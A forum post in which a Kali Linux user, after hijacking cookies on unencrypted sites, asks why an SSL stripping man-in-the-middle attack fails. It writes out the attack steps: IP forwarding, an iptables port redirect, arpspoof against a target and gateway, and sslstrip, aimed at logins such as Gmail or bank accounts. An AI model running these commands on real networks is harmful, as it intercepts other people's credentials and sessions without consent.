Hi folks,

After playing around with Kali Linux 1.0.6 a bit, and succesfully being able to hijack cookies/sessions on non-secured websites (using wireshark and later hamster/ferret with ettercap), I decided to give SSL Strip a try.

But no matter what tutorial or Youtube movie I follow (and they're generally the same), it simply doesnt work for me.

Every tutorial describes it a bit different, but here's what I generally do:

1. Enable ip forward by doing: echo 1 > /proc/sys/net/ipv4/ip_forward
2. Use iptables to redirect traffic over port 80 to port 8080 OR 10000 (different tutorials use either of those two), with command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port [8080/10000]
3. Setup arpspoof. I tried this with ettercap, but last couple of times I tried it with ARPspoof, with the command: arpspoof -i eth0 -t [target IP] -r [Gateway IP]
4. Open up SSLstrip by doing: sslstrip -l [8080/10000]

Then, when I go to the target PC and go to facebook/gmail/bank account/whatever, frankly nothing happens! I open the sslstrip.conf, but it's just empty. I'm really desperate as to what the problem is.

The versions I am using are:
- Kali 1.0.6
- ARPspoof 2.4
- iptables 1.4.14
- SSLstrip 0.9

The only thing I can imagine being the problem is the fact that I am running Kali Linux on a Windows machine using VMWare Workstation. I did set up the VM so that the Virtual NIC uses bridged mode (so the VM gets its own IP-address), rather than using NAT. On the other hand, I was able to succesfully sniff/hijack non-secured traffic, so I really wonder if this is the cause of the problem.

Does anyone has any idea?

Regards, Lq